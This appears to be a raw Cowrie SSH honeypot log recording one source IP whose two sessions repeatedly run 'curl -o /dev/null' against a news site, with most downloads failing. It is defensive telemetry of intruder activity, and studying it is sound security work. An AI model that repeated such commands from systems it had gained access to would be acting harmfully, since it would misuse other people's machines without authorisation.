{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.758277Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.759282Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.804096Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.805217Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.807205Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.809052Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.810171Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.827385Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.849595Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.879234Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.880458Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.887680Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.888853Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.898818Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.915728Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.944488Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.974827Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.979310Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.980532Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.988741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.989898Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.999425Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.027475Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.032694Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.033857Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.054711Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.066870Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.068212Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.088575Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.089767Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.107911Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.109029Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.110750Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.141109Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.158542Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.159925Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.181517Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.182711Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.196596Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.212057Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.213569Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.230408Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.231328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.262022Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.266280Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.267766Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.284786Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.286000Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.290544Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.307757Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.309254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.325982Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.332200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.333523Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.344774Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.346282Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.347717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.366500Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.378079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.378935Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.384497Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.388223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.389557Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.414191Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.416647Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.450325Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.457448Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.458948Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.467118Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.468526Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.527928Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.529720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.534803Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.536120Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.539207Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.569176Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.570952Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.599820Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.601140Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.605675Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.606789Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.608869Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.611588Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.669017Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.670573Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.675949Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.677250Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.704763Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.739212Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.740702Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.742957Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.744013Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.754198Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.778902Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.780084Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.782114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.783088Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.797546Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.814390Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.815478Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.819842Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.820946Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.853121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.854500Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.856804Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.862262Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.863645Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.900549Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.901827Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.904774Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.906489Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.913630Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.914775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.943601Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.944973Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.948318Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.962809Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.964092Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.981020Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:56.994061Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:56.995296Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.002548Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.018870Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.020280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.047739Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.049082Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.061990Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.079645Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
